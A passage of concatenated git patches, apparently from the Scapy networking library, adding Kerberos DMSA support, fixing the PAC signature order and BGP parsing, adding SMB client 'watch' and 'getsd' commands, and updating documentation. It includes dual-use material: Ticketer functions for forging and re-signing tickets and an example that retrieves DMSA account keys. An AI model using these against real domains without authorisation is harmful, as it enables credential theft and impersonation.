-| ``t.request_st(i, spn, [...])`` | Request a ST using ticket i | -+-------------------------------------+--------------------------------+ -| ``t.renew(i, [...])`` | Renew a TGT/ST | -+-------------------------------------+--------------------------------+ ++---------------------------------------+--------------------------------+ +| Command | Description | ++=======================================+================================+ +| ``load_module("ticketer")`` | Load ticketer++ | ++---------------------------------------+--------------------------------+ +| ``t = Ticketer()`` | Create a Ticketer object | ++---------------------------------------+--------------------------------+ +| ``t.open_ccache("/tmp/krb5cc_1000")`` | Open a ccache file | ++---------------------------------------+--------------------------------+ +| ``t.save()`` | Save a ccache file | ++---------------------------------------+--------------------------------+ +| ``t.show()`` | List the tickets | ++---------------------------------------+--------------------------------+ +| ``t.create_ticket()`` | Forge a ticket | ++---------------------------------------+--------------------------------+ +| ``dTkt = t.dec_ticket()`` | Decipher a ticket | ++---------------------------------------+--------------------------------+ +| ``t.update_ticket(, dTkt)`` | Re-inject a deciphered ticket | ++---------------------------------------+--------------------------------+ +| ``t.edit_ticket()`` | Edit a ticket (GUI) | ++---------------------------------------+--------------------------------+ +| ``t.resign_ticket()`` | Resign a ticket | ++---------------------------------------+--------------------------------+ +| ``t.request_tgt(upn, [...])`` | Request a TGT | ++---------------------------------------+--------------------------------+ +| ``t.request_st(i, spn, [...])`` | Request a ST using ticket i | ++---------------------------------------+--------------------------------+ +| ``t.renew(i, [...])`` | Renew a TGT/ST | ++---------------------------------------+--------------------------------+ Other useful commands --------------------- From 4f352344793416bd5a8a25a758df655856c6533b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 22 May 2025 08:38:50 +0200 Subject: [PATCH 1471/1632] Support DMSA in Kerberos tgs_req (#4746) --- scapy/layers/kerberos.py | 118 ++++++++++++++++++++++++++++++--------- scapy/libs/rfc3961.py | 2 +- 2 files changed, 94 insertions(+), 26 deletions(-) diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index b3be884d46c..7fe224485d6 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -139,6 +139,7 @@ ) from scapy.layers.inet import TCP, UDP from scapy.layers.smb import _NV_VERSION +from scapy.layers.x509 import X509_AlgorithmIdentifier # Typing imports from typing import ( @@ -480,8 +481,8 @@ def get_usage(self): # [MS-SFU] sect 2.2.1 return 17 elif isinstance(self.underlayer, PA_S4U_X509_USER): - # [MS-SFU] sect 2.2.1 - return 17 + # [MS-SFU] sect 2.2.2 + return 26 elif isinstance(self.underlayer, AD_KDCIssued): # AD-KDC-ISSUED checksum return 19 @@ -672,6 +673,7 @@ class AD_AND_OR(ASN1_Packet): 17: "PA-PK-AS-REP", 19: "PA-ETYPE-INFO2", 20: "PA-SVR-REFERRAL-INFO", + 111: "TD-CMS-DIGEST-ALGORITHMS", 128: "PA-PAC-REQUEST", 129: "PA-FOR-USER", 130: "PA-FOR-X509-USER", @@ -805,6 +807,18 @@ class ETYPE_INFO2(ASN1_Packet): _PADATA_CLASSES[19] = ETYPE_INFO2 + +# RFC8636 - PKINIT Algorithm Agility + + +class TD_CMS_DIGEST_ALGORITHMS(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE_OF("seq", [], X509_AlgorithmIdentifier) + + +_PADATA_CLASSES[111] = TD_CMS_DIGEST_ALGORITHMS + + # PADATA Extended with RFC6113 @@ -1271,7 +1285,9 @@ class S4UUserID(ASN1_Packet): [ "reserved", "KDC_CHECK_LOGON_HOUR_RESTRICTIONS", - "KDC_KEY_USAGE_27", + "USE_REPLY_KEY_USAGE", + "NT_AUTH_POLICY_NOT_REQUIRED", + "UNCONDITIONAL_DELEGATION", ], explicit_tag=0xA4, ) @@ -2690,6 +2706,7 @@ class KerberosClient(Automaton): :param u2u: sets the U2U flag :param for_user: the UPN of another user in TGS-REQ, to do a S4U2Self :param s4u2proxy: sets the S4U2Proxy flag + :param dmsa: sets the 'unconditional delegation' mode for DMSA TGT retrieval :param kdc_proxy: specify a KDC proxy url :param kdc_proxy_no_check_certificate: do not check the KDC proxy certificate :param fast: use FAST armoring @@ -2725,6 +2742,7 @@ def __init__( u2u=False, for_user=None, s4u2proxy=False, + dmsa=False, kdc_proxy=None, kdc_proxy_no_check_certificate=False, fast=False, @@ -2838,6 +2856,7 @@ def __init__( self.u2u = u2u # U2U self.for_user = for_user # FOR-USER self.s4u2proxy = s4u2proxy # S4U2Proxy + self.dmsa = dmsa # DMSA self.key = key self.subkey = None # In the AP-REQ authenticator self.replykey = None # Key used for reply @@ -3152,34 +3171,83 @@ def tgs_req(self): # [MS-SFU] FOR-USER extension if self.for_user is not None: - from scapy.libs.rfc3961 import ChecksumType - - paforuser = PA_FOR_USER( - userName=PrincipalName.fromUPN(self.for_user), - userRealm=ASN1_GENERAL_STRING(_parse_upn(self.for_user)[1]), - cksum=Checksum(), - ) - S4UByteArray = struct.pack( # [MS-SFU] sect 2.2.1 - " Date: Thu, 22 May 2025 12:07:07 +0300 Subject: [PATCH 1472/1632] BGP: support undefined generic transitive extended communities sub-types (#4745) --- scapy/contrib/bgp.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/scapy/contrib/bgp.py b/scapy/contrib/bgp.py index 4da780d287a..d8564a9b795 100644 --- a/scapy/contrib/bgp.py +++ b/scapy/contrib/bgp.py @@ -1741,6 +1741,9 @@ def m2i(self, pkt, m): elif type_low == 0x09: ret = BGPPAExtCommTrafficMarking(m) + else: + ret = conf.raw_layer(m) + elif type_high == 0x81: # FlowSpec if type_low == 0x08: From c419e663577f2180c4e1d484ce420be10b67963a Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 22 May 2025 23:36:51 +0200 Subject: [PATCH 1473/1632] Add doc for DMSA + check signature in SFU response (#4747) --- doc/scapy/layers/kerberos.rst | 31 +++++++++++++++++++++++++ scapy/layers/kerberos.py | 43 +++++++++++++++++++++++++++++++---- scapy/modules/ticketer.py | 36 +++++++++++++++++++++-------- 3 files changed, 96 insertions(+), 14 deletions(-) diff --git a/doc/scapy/layers/kerberos.rst b/doc/scapy/layers/kerberos.rst index a9d8472a443..fcc8beb1a27 100644 --- a/doc/scapy/layers/kerberos.rst +++ b/doc/scapy/layers/kerberos.rst @@ -130,6 +130,37 @@ that are available. For more detail regarding the parameters of the functions, i Start time End time Renew until Auth time 15/04/25 20:15:20 16/04/25 06:10:22 16/04/25 06:10:22 15/04/25 20:15:17 +- **Request a ticket for a DMSA** + +For more information about DMSAs and how to create them, consult the `relevant Microsoft documentation `_. In this example we allowed ``SERVER1$`` to retrieve the managed password of ``dmsa_user$``. + +.. code:: pycon + + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.request_tgt("SERVER1$@domain.local", key=Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, bytes.fromhex("63a2577d8bf6abeba0847cded36b9aed202c23750eb9c56b6155be1cc946bb1d"))) + >>> t.request_st(0, "krbtgt/domain.local", for_user="dmsa_user$@domain.local", dmsa=True) + INFO: 3 DMSA keys found and imported ! + >>> t.show() + Keytab name: UNSAVED + Principal Timestamp KVNO Keytype + dmsa_user$@domain.local 22/05/25 22:03:58 1 AES256-CTS-HMAC-SHA1-96 + dmsa_user$@domain.local 22/05/25 22:03:58 2 AES128-CTS-HMAC-SHA1-96 + dmsa_user$@domain.local 22/05/25 22:03:58 3 RC4-HMAC + + CCache tickets: + 0. SERVER1$@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + canonicalize+pre-authent+initial+renewable+forwardable + Start time End time Renew until Auth time + 22/05/25 22:06:32 23/05/25 08:03:53 23/05/25 08:03:53 22/05/25 22:06:32 + + 1. dmsa_user$@domain.local -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + canonicalize+pre-authent+renewable+forwardable + Start time End time Renew until Auth time + 22/05/25 22:06:37 23/05/25 08:03:53 23/05/25 08:03:53 22/05/25 22:06:32 + +As you can see, DMSA keys were imported in the keytab. You can use those as detailed in some of the following sections. + - **Load and use keytab for client** .. code:: pycon diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 7fe224485d6..1da46b8d956 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -701,6 +701,8 @@ class AD_AND_OR(ASN1_Packet): 165: "PA-SUPPORTED-ENCTYPES", 166: "PA-EXTENDED-ERROR", 167: "PA-PAC-OPTIONS", + 170: "KERB-SUPERSEDED-BY-USER", + 171: "KERB-DMSA-KEY-PACKAGE", } _PADATA_CLASSES = { @@ -1053,6 +1055,9 @@ class KERB_SUPERSEDED_BY_USER(ASN1_Packet): ) +_PADATA_CLASSES[170] = KERB_SUPERSEDED_BY_USER + + # [MS-KILE] sect 2.2.14 @@ -1070,7 +1075,7 @@ class KERB_DMSA_KEY_PACKAGE(ASN1_Packet): "previousKeys", [], ASN1F_PACKET("", None, EncryptionKey), - explicit_tag=0xA0, + explicit_tag=0xA1, ), ), KerberosTime("expirationInterval", GeneralizedTime(), explicit_tag=0xA2), @@ -1078,6 +1083,9 @@ class KERB_DMSA_KEY_PACKAGE(ASN1_Packet): ) +_PADATA_CLASSES[171] = KERB_DMSA_KEY_PACKAGE + + # RFC6113 sect 5.4.1 @@ -1558,6 +1566,12 @@ class KRB_TGS_REP(ASN1_Packet): implicit_tag=ASN1_Class_KRB.TGS_REP, ) + def getUPN(self): + return "%s@%s" % ( + self.cname.toString(), + self.crealm.val.decode(), + ) + class LastReqItem(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER @@ -3389,6 +3403,19 @@ def _process_padatas_and_key(self, padatas): ) elif padata.padataType == 137: # PA-FX-ERROR self.fast_error = padata.padataValue + elif padata.padataType == 130: # PA-FOR-X509-USER + # Verify S4U checksum + key_usage_number = None + pasfux509 = padata.padataValue + # [MS-SFU] sect 2.2.2 + # "In a reply, indicates that it was signed with key usage 27" + if pasfux509.userId.options.val[2] == "1": # USE_REPLY_KEY_USAGE + key_usage_number = 27 + pasfux509.checksum.verify( + self.key, + bytes(pasfux509.userId), + key_usage_number=key_usage_number, + ) # 2. Update the current key if necessary @@ -3455,10 +3482,10 @@ def receive_krb_error_as_req(self, pkt): return if pkt.root.errorCode == 25: # KDC_ERR_PREAUTH_REQUIRED - if not self.key and (not self.upn or not self.password): + if not self.key: log_runtime.error( "Got 'KDC_ERR_PREAUTH_REQUIRED', " - "but no key, nor upn+pass was passed." + "but no possible key could be computed." ) raise self.FINAL() self.should_followup = True @@ -3542,7 +3569,11 @@ def receive_krb_error_tgs_req(self, pkt): @ATMT.receive_condition(SENT_TGS_REQ) def receive_tgs_rep(self, pkt): if Kerberos in pkt and isinstance(pkt.root, KRB_TGS_REP): - if not self.renew and pkt.root.ticket.sname.nameString[0].val == b"krbtgt": + if ( + not self.renew + and not self.dmsa + and pkt.root.ticket.sname.nameString[0].val == b"krbtgt" + ): log_runtime.warning("Received a cross-realm referral ticket !") raise self.FINAL().action_parameters(pkt) @@ -3570,6 +3601,8 @@ def decrypt_tgs_rep(self, pkt): res = enc.decrypt(self.replykey, key_usage_number=9, cls=EncTGSRepPart) else: res = enc.decrypt(self.replykey) + + # Store result self.result = self.RES_TGS_MODE(pkt.root, res.key.toKey(), res) @ATMT.state(final=1) @@ -4169,6 +4202,8 @@ def GSS_WrapEx(self, Context, msgs, qop_req=0): Data = b"".join(x.data for x in msgs if x.conf_req_flag) DataLen = len(Data) # 2. Add filler + # [MS-KILE] sect 3.4.5.4.1 - "For AES-SHA1 ciphers, the EC must not + # be zero" tok.root.EC = ((-DataLen) % Context.KrbSessionKey.ep.blocksize) or 16 Filler = b"\x00" * tok.root.EC Data += Filler diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py index 9577c934392..6abb6e98b1b 100644 --- a/scapy/modules/ticketer.py +++ b/scapy/modules/ticketer.py @@ -695,6 +695,21 @@ def import_krb(self, res, key=None, hash=None, _inplace=None): rep = res.asrep elif isinstance(res, KerberosClient.RES_TGS_MODE): rep = res.tgsrep + + # There could be 171 = KERB_DMSA_KEY_PACKAGE to import + for padata in res.kdcrep.encryptedPaData: + if padata.padataType == 171: + # We have keys to import. + key_package = padata.padataValue + for key in key_package.currentKeys: + self.add_cred( + principal=rep.getUPN(), + key=key.toKey(), + ) + log_interactive.info( + "%s DMSA keys found and imported !" + % len(key_package.currentKeys) + ) else: raise ValueError("Unknown type of obj !") cred.set_from_krb( @@ -2343,15 +2358,16 @@ def _resign_ticket(self, tkt, spn, hash=None, kdc_hash=None): hash=kdc_hash, ) - # NOTE: the doc is very unclear regarding the order of the Signatures. + # Doc was updated after feedback ! it's now very clear. - # "The extended KDC signature is a keyed hash [RFC4757] of the entire PAC - # message, with the Signature fields of all other PAC_SIGNATURE_DATA structures - # (section 2.8) set to zero." - # ==> This is wrong. - # The Ticket Signature is present when computing the Extended KDC Signature. + # [MS-PAC] sect 2.8.1 + # Signatures are computed in this order: + # - Ticket signature + # - Extended KDC signature + # - Server signature + # - KDC signature - # sect 2.8.3 - Ticket Signature + # sect 2.8.2 - Ticket Signature if 0x00000010 in sig_i: # "The ad-data in the PAC’s AuthorizationData element ([RFC4120] @@ -2365,7 +2381,7 @@ def _resign_ticket(self, tkt, spn, hash=None, kdc_hash=None): # included in the PAC when signing it for Extended Server Signature & Server Signature pac.Payloads[sig_i[0x00000010]].Signature = ticket_sig - # sect 2.8.4 - Extended KDC Signature + # sect 2.8.3 - Extended KDC Signature if 0x00000013 in sig_i: rpac.Payloads[sig_i[0x00000013]].Signature = extended_kdc_sig = ( @@ -2374,13 +2390,13 @@ def _resign_ticket(self, tkt, spn, hash=None, kdc_hash=None): # included in the PAC when signing it for Server Signature pac.Payloads[sig_i[0x00000013]].Signature = extended_kdc_sig - # sect 2.8.1 - Server Signature + # sect 2.8.4 - Server Signature rpac.Payloads[sig_i[0x00000006]].Signature = server_sig = key_srv.make_checksum( 17, bytes(pac) # KERB_NON_KERB_CKSUM_SALT(17) ) - # sect 2.8.2 - KDC Signature + # sect 2.8.5 - KDC Signature rpac.Payloads[sig_i[0x00000007]].Signature = key_kdc.make_checksum( 17, server_sig # KERB_NON_KERB_CKSUM_SALT(17) From 8b002b69932e3b28218777593676906c82b3f6a9 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 23 May 2025 07:50:26 +0200 Subject: [PATCH 1474/1632] Include modules/ in doc and improve doc (#4748) --- doc/scapy/layers/kerberos.rst | 55 ++++++++++++++--------------------- scapy/libs/extcap.py | 4 ++- scapy/libs/rfc3961.py | 4 +++ scapy/modules/p0f.py | 24 +++++++++------ tox.ini | 5 ++-- 5 files changed, 47 insertions(+), 45 deletions(-) diff --git a/doc/scapy/layers/kerberos.rst b/doc/scapy/layers/kerberos.rst index fcc8beb1a27..8b8f78a0fe0 100644 --- a/doc/scapy/layers/kerberos.rst +++ b/doc/scapy/layers/kerberos.rst @@ -3,33 +3,21 @@ Kerberos .. note:: Kerberos per `RFC4120 `_ + `RFC6113 `_ (FAST) + `[MS-KILE] `_ (Windows) -High-Level -__________ - -Scapy provides several high-level utilities related to Kerberos: - -- ``Ticketer``: a module that allows manipulating Kerberos tickets: - - Request TGT/ST - - Generate a ``KerberosSSP`` from a ST - - Renew tickets - - Read, create, write **ccache** files - - Read, create, write **keytab** files - - Kerberos armoring (via FAST) is available - - S4U2Self / S4U2Proxy are implemented - - KPasswd is implemented -- ``KerberosSSP``: an implementation of a GSSAPI SSP for Kerberos, usable in any of Scapy's client that support GSSAPI. - - Encryption/MIC using GSSAPI is available - - Channel bindings are supported - - U2U (User-To-User) is fully supported - - [MS-KKDCP] (KDC proxy) is supported +Scapy's Kerberos implementation is accessed through two main components: + +- :class:`~scapy.modules.ticketer.Ticketer`: a module that allows manipulating Kerberos tickets; +- :class:`~scapy.layers.kerberos.KerberosSSP`: an implementation of a GSSAPI SSP for Kerberos, usable in any of Scapy's client that support GSSAPI, for both authentication and encryption. + +The general idea is that the first one allows to request tickets and perform almost all Kerberos related operations (S4U2Self, S4U2Proxy, FAST armoring, U2U, DMSA, etc.). The latter is used once a final Service Ticket is obtained, by other parts of Scapy, for instance `SMB `_, `LDAP `_ or `DCE/RPC `_. Ticketer module ~~~~~~~~~~~~~~~ -The **Ticketer** module can be used both from the CLI or programmatically. This section tries to give many usage examples of features -that are available. For more detail regarding the parameters of the functions, it is encouraged to have a look at their docstrings. +The :class:`~scapy.modules.ticketer.Ticketer` module can be used both from the CLI or programmatically to perform operations on Kerberos tickets. To use it, you must first create an instance of a :class:`~scapy.modules.ticketer.Ticketer`, which acts as both a **ccache** (holds tickets) and a **keytab** (holds secrets). + +This section tries to give many usage examples, but isn't exhaustive. For more details regarding the parameters of each functions, it is encouraged to have a look at the docstrings of :class:`~scapy.layers.kerberos.KerberosClient`. -- **Request TGT**: +- **Request TGT**: see the docstring of :func:`~scapy.layers.kerberos.krb_as_req` .. code:: pycon @@ -44,7 +32,7 @@ that are available. For more detail regarding the parameters of the functions, i 31/08/23 11:38:34 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 -- **Then request a ST, using the TGT**: +- **Then request a ST, using the TGT**: see the docstring of :func:`~scapy.layers.kerberos.krb_tgs_req` .. code:: pycon @@ -61,7 +49,7 @@ that are available. For more detail regarding the parameters of the functions, i 31/08/23 11:39:07 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 -- **Use ticket as SSP**: the ``.ssp()`` function. +- **Use ticket as SSP**: the :func:`~scapy.modules.ticketer.Ticketer.ssp` function. .. code:: pycon @@ -467,11 +455,12 @@ You can typically use it in :class:`~scapy.layers.smbclient.SMB_Client`, :class: .. note:: Remember that you can wrap it in a :class:`~scapy.layers.spnego.SPNEGOSSP` -Low-level -_________ +See `GSSAPI `_ for usage examples. -Decrypt kerberos packets -~~~~~~~~~~~~~~~~~~~~~~~~ +Decrypt kerberos packets manually +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +.. note:: This section is useful to understand the inner workings of Kerberos, but isn't necessary to use Scapy's implementation. Kerberos packets contain encrypted content, let's take the following packet: @@ -576,10 +565,10 @@ Let's run a few examples: '4c01cd46d632d01e6dbe230a01ed642a' -Decrypt FAST -~~~~~~~~~~~~ +Decrypt FAST manually +~~~~~~~~~~~~~~~~~~~~~ -.. note:: Have a look at `RFC6113 `_ for Kerberos FAST +.. note:: This section is useful to understand the inner workings of Kerberos FAST, but FAST can simply be used in :class:`~scapy.modules.ticketer.Ticketer` through the ``armor_with`` parameter when performing either a ASREQ or TGSREQ. For more details related to how FAST works, have a look at `RFC6113 `_. Let's take a Kerberos AS-REQ packet with FAST armoring (RFC6113): @@ -802,8 +791,8 @@ That we can now use to decrypt the last payload: | encAuthorizationData= None | additionalTickets= None -Encryption -~~~~~~~~~~ +Manually using Kerberos encryption +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A :func:`~scapy.libs.rfc3961.Key.encrypt` function exists in the :class:`~scapy.libs.rfc3961.Key` object in order to do the opposite of :func:`~scapy.libs.rfc3961.Key.decrypt`. diff --git a/scapy/libs/extcap.py b/scapy/libs/extcap.py index 60c6977a059..f424b630163 100644 --- a/scapy/libs/extcap.py +++ b/scapy/libs/extcap.py @@ -233,7 +233,9 @@ def _format(self, def load_extcap() -> None: """ - Load extcap folder from wireshark and populate providers + Load extcap folder from wireshark and populate Scapy's providers. + + Additional interfaces should appear in conf.ifaces. """ if WINDOWS: pattern = re.compile(r"^[^.]+(?:\.bat|\.exe)?$") diff --git a/scapy/libs/rfc3961.py b/scapy/libs/rfc3961.py index 9092614af3f..baa041a1c4c 100644 --- a/scapy/libs/rfc3961.py +++ b/scapy/libs/rfc3961.py @@ -13,6 +13,10 @@ - RFC 4757: The RC4-HMAC Kerberos Encryption Types Used by Microsoft Windows - RFC 6113: A Generalized Framework for Kerberos Pre-Authentication - RFC 8009: AES Encryption with HMAC-SHA2 for Kerberos 5 + +.. note:: + You will find more complete documentation for Kerberos over at + `SMB `_ """ # TODO: support cipher states... diff --git a/scapy/modules/p0f.py b/scapy/modules/p0f.py index 085462f61d4..09bef7e4585 100644 --- a/scapy/modules/p0f.py +++ b/scapy/modules/p0f.py @@ -333,13 +333,16 @@ def __init__(self, label_id, sig_line): class p0fKnowledgeBase(KnowledgeBase): """ - self.base = { - "mtu" (str): [sig(tuple), ...] - "tcp"/"http" (str): { - direction (str): [sig(tuple), ...] + .. code:: + + self.base = { + "mtu" (str): [sig(tuple), ...] + "tcp"/"http" (str): { + direction (str): [sig(tuple), ...] } - } - self.labels = (label(tuple), ...) + } + self.labels = (label(tuple), ...) + """ def lazy_init(self): try: @@ -753,10 +756,12 @@ def add_field(name, value): def p0f_impersonate(pkt, osgenre=None, osdetails=None, signature=None, extrahops=0, mtu=1500, uptime=None): - """Modifies pkt so that p0f will think it has been sent by a + """ + Modifies pkt so that p0f will think it has been sent by a specific OS. Either osgenre or signature is required to impersonate. If signature is specified (as a raw string), we use the signature. - signature format: + signature format:: + "ip_ver:ttl:ip_opt_len:mss:window,wscale:opt_layout:quirks:pay_class" If osgenre is specified, we randomly pick a signature with a label @@ -765,7 +770,8 @@ def p0f_impersonate(pkt, osgenre=None, osdetails=None, signature=None, is a substring of a label flavor ("7", "8" and "7 or 8" will all match the label "s:win:Windows:7 or 8") - For now, only TCP SYN/SYN+ACK packets are supported.""" + For now, only TCP SYN/SYN+ACK packets are supported. + """ pkt = validate_packet(pkt) if not osgenre and not signature: diff --git a/tox.ini b/tox.ini index 9fc2ef22960..d5dafd033b9 100644 --- a/tox.ini +++ b/tox.ini @@ -94,8 +94,9 @@ description = "Regenerates the API reference doc tree" skip_install = true changedir = {toxinidir}/doc/scapy deps = sphinx + cryptography commands = - sphinx-apidoc -f --no-toc -d 1 --separate --module-first --templatedir=_templates --output-dir api ../../scapy ../../scapy/modules/ ../../scapy/libs/ ../../scapy/tools/ ../../scapy/arch/ ../../scapy/contrib/scada/* ../../scapy/layers/msrpce/raw/ ../../scapy/layers/msrpce/all.py ../../scapy/all.py ../../scapy/layers/all.py ../../scapy/compat.py + sphinx-apidoc -f --no-toc -d 1 --separate --module-first --templatedir=_templates --output-dir api ../../scapy ../../scapy/modules/voip.py ../../scapy/modules/krack/ ../../scapy/libs/winpcapy.py ../../scapy/libs/ethertypes.py ../../scapy/libs/m*.py ../../scapy/libs/structures.py ../../scapy/libs/test_pyx.py ../../scapy/tools/ ../../scapy/arch/ ../../scapy/contrib/scada/* ../../scapy/layers/msrpce/raw/ ../../scapy/layers/msrpce/all.py ../../scapy/all.py ../../scapy/layers/all.py ../../scapy/compat.py [testenv:mypy] @@ -109,7 +110,7 @@ commands = python .config/mypy/mypy_check.py linux [testenv:docs] description = "Build the docs" -deps = +deps = cryptography extras = doc changedir = {toxinidir}/doc/scapy commands = From b564a138a5c17f54a8a15ea488357b0d2783031d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 27 May 2025 20:14:52 +0200 Subject: [PATCH 1475/1632] Minor SMB/Kerberos improvements (#4749) --- scapy/fields.py | 6 +++ scapy/layers/kerberos.py | 6 ++- scapy/layers/smb2.py | 1 + scapy/layers/smbclient.py | 99 +++++++++++++++++++++++++++++++++++++-- 4 files changed, 106 insertions(+), 6 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 443a2d13124..3f423b90e70 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2783,6 +2783,12 @@ def __init__(self, name, default, enum): super(LEIntEnumField, self).__init__(name, default, enum, " str + return lhex(x) + + class XShortEnumField(ShortEnumField): def _i2repr(self, pkt, x): # type: (Optional[Packet], Any) -> str diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 1da46b8d956..51fc17bbba5 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -111,6 +111,7 @@ StrFixedLenEnumField, XByteField, XLEIntField, + XLEIntEnumField, XLEShortField, XStrFixedLenField, XStrLenField, @@ -139,6 +140,7 @@ ) from scapy.layers.inet import TCP, UDP from scapy.layers.smb import _NV_VERSION +from scapy.layers.smb2 import STATUS_ERREF from scapy.layers.x509 import X509_AlgorithmIdentifier # Typing imports @@ -1874,7 +1876,7 @@ def m2i(self, pkt, s): try: return KERB_ERROR_DATA(val[0].val, _underlayer=pkt), val[1] except BER_Decoding_Error: - if pkt.errorCode.val in [18]: + if pkt.errorCode.val in [18, 12]: # Some types can also happen in FAST sessions # 18: KDC_ERR_CLIENT_REVOKED return MethodData(val[0].val, _underlayer=pkt), val[1] @@ -2015,7 +2017,7 @@ def getSPN(self): class KERB_EXT_ERROR(Packet): fields_desc = [ - XLEIntField("status", 0), + XLEIntEnumField("status", 0, STATUS_ERREF), XLEIntField("reserved", 0), XLEIntField("flags", 0x00000001), ] diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 230b3be4d8b..037d340b2cd 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -120,6 +120,7 @@ 0xC0000064: "STATUS_NO_SUCH_USER", 0xC000006D: "STATUS_LOGON_FAILURE", 0xC000006E: "STATUS_ACCOUNT_RESTRICTION", + 0xC0000070: "STATUS_INVALID_WORKSTATION", 0xC0000071: "STATUS_PASSWORD_EXPIRED", 0xC0000072: "STATUS_ACCOUNT_DISABLED", 0xC000009A: "STATUS_INSUFFICIENT_RESOURCES", diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index b0532491abe..adf7b093fdb 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -72,15 +72,15 @@ DirectTCP, FileAllInformation, FileIdBothDirectoryInformation, - SMB_DIALECTS, + SECURITY_DESCRIPTOR, + SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2, + SMB2_CREATE_REQUEST_LEASE, + SMB2_CREATE_REQUEST_LEASE_V2, SMB2_Change_Notify_Request, SMB2_Change_Notify_Response, SMB2_Close_Request, SMB2_Close_Response, SMB2_Create_Context, - SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2, - SMB2_CREATE_REQUEST_LEASE_V2, - SMB2_CREATE_REQUEST_LEASE, SMB2_Create_Request, SMB2_Create_Response, SMB2_ENCRYPTION_CIPHERS, @@ -111,6 +111,7 @@ SMB2_Write_Request, SMB2_Write_Response, SMBStreamSocket, + SMB_DIALECTS, SRVSVC_SHARE_TYPES, STATUS_ERREF, ) @@ -1822,6 +1823,96 @@ def backup(self): print("Backup Intent: On") self.extra_create_options.append("FILE_OPEN_FOR_BACKUP_INTENT") + @CLIUtil.addcommand(spaces=True) + def watch(self, folder): + """ + Watch file changes in folder (recursively) + """ + if self._require_share(): + return + # Get pwd of the ls + fpath = self.pwd / folder + self.smbsock.set_TID(self.current_tree) + # Open file + fileId = self.smbsock.create_request( + self.normalize_path(fpath), + type="folder", + extra_create_options=self.extra_create_options, + ) + print("Watching '%s'" % fpath) + # Watch for changes + try: + while True: + changes = self.smbsock.changenotify(fileId) + for chg in changes: + print(chg.sprintf("%.time%: %Action% %FileName%")) + except KeyboardInterrupt: + pass + # Close the file + self.smbsock.close_request(fileId) + print("Cancelled.") + + @CLIUtil.addcommand(spaces=True) + def getsd(self, file): + """ + Get the Security Descriptor + """ + if self._require_share(): + return + fpath = self.pwd / file + self.smbsock.set_TID(self.current_tree) + # Open file + fileId = self.smbsock.create_request( + self.normalize_path(fpath), + type="", + mode="", + extra_desired_access=["READ_CONTROL", "ACCESS_SYSTEM_SECURITY"], + ) + # Get the file size + info = self.smbsock.query_info( + FileId=fileId, + InfoType="SMB2_0_INFO_SECURITY", + FileInfoClass=0, + AdditionalInformation=( + 0x00000001 + | 0x00000002 + | 0x00000004 + | 0x00000008 + | 0x00000010 + | 0x00000020 + | 0x00000040 + | 0x00010000 + ), + ) + self.smbsock.close_request(fileId) + return info + + @CLIUtil.addcomplete(getsd) + def getsd_complete(self, file): + """ + Auto-complete getsd + """ + if self._require_share(silent=True): + return [] + return self._fs_complete(file) + + @CLIUtil.addoutput(getsd) + def getsd_output(self, results): + """ + Print the output of 'getsd' + """ + sd = SECURITY_DESCRIPTOR(results) + print("Owner:", sd.OwnerSid.summary()) + print("Group:", sd.GroupSid.summary()) + if getattr(sd, "DACL", None): + print("DACL:") + for ace in sd.DACL.Aces: + print(" - ", ace.toSDDL()) + if getattr(sd, "SACL", None): + print("SACL:") + for ace in sd.SACL.Aces: + print(" - ", ace.toSDDL()) + if __name__ == "__main__": from scapy.utils import AutoArgparse From 38ab7de468e4dd8d8f88a0befe5a10dce4375aa2 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 28 May 2025 08:51:53 +0200 Subject: [PATCH 1476/1632] Minor QoL fixes (#4750) * Fix warning * IPython: disable tip in -H mode --- scapy/layers/smbserver.py | 3 ++- scapy/main.py | 2 ++ 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/scapy/layers/smbserver.py b/scapy/layers/smbserver.py index 8fba2238c51..ff20151c7bd 100644 --- a/scapy/layers/smbserver.py +++ b/scapy/layers/smbserver.py @@ -26,6 +26,7 @@ from scapy.arch import get_if_addr from scapy.automaton import ATMT, Automaton from scapy.config import conf +from scapy.consts import WINDOWS from scapy.error import log_runtime, log_interactive from scapy.volatile import RandUUID @@ -1058,7 +1059,7 @@ def lookup_file(self, fname, durable_handle=None, create=False, createOptions=No # Note: symbolic links are currently unsupported. if root not in path.parents and path != root: raise FileNotFoundError - if path.is_reserved(): + if WINDOWS and path.is_reserved(): raise FileNotFoundError if not path.exists(): if create and createOptions: diff 